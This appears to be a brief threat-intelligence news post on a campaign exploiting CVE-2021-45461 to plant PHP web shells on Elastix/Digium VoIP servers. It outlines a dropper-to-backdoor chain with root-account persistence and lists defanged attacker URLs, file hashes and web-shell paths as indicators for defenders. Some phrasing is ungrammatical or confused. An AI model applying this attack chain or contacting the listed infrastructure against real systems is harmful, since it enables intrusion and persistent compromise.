
Researchers has took a campaign in to limelight targeting the Elastix system used in Digium phones.
Tracked as CVE-2021-45461 with CVSS of 9.8 , exist in the Rest Phone Apps module to implant a web shell on VoIP servers. The attackers used the web shell to exfiltrate data by dropping additional payloads inside the target’s Digium phone software.
A high volume of malicious traffic likely originating from more than 500,000 unique samples over the period spanning from mid-December 2021 till the end of March 2022. The traffic targets Digium open source Asterisk communication software for VoIP phone devices.
The attack chains start with a code retrieving a shell script dropper from a remote server, which, in turn, downloads and executes obfuscated PHP backdoor in multiple locations in the file system.
The PHP backdoor also creates several root user accounts and set up a scheduled task to maintain the persistence and re-infect the host system.
The malware supports arbitrary commands via the cmd request parameter along with built-in default commands that can allow operators to carry out malicious activities.
This research was conducted and documented by researchers from Palo Alto Networks
Indicators of Compromise
- hxxp[://]37[.]49[.]230[.]74/k[.]php
- hxxp[://]37[.]49[.]230[.]74/z/wr[.]php
- hxxp[://]37[.]49[.]230[.]74/z/post/noroot[.]php
- hxxp[://]37[.]49[.]230[.]74/z/post/root[.]php
Original Shell Scripts – SHA256 hashes
- 000a3688455edacc1dac17539797dc98f055091898a65cd520fb8459c1bc2a2a
- 0012342749e3bae85a9269a93661e2eb00437c71b2bca2eaca458147f9fe8471
- 001305bd3be538e50014d42f02dee55056b73a1df770e2605aded8a970091f2f
- 0050232e04880fbe1d0c670b711b66bb46c32febdc9513074612c90f1f24631b
- 0059d7b736dc1e61bd5b22fff601579fbc8a12b00981fdd34fd13f0fb44688b0
- 0088cba19eec78daee0310854c4bf8f7efc64b89bdc7517f0a1c7ebbba673f72
Local Filepaths
- /var/www/html/admin/assets/ajax.php
- /var/www/html/admin/assets/config.php
- /var/www/html/admin/assets/js/config.php
- /var/www/html/admin/modules/core/ajax.php
- /var/www/html/digium_phones/ajax.php
- /var/www/html/rest_phones/ajax.php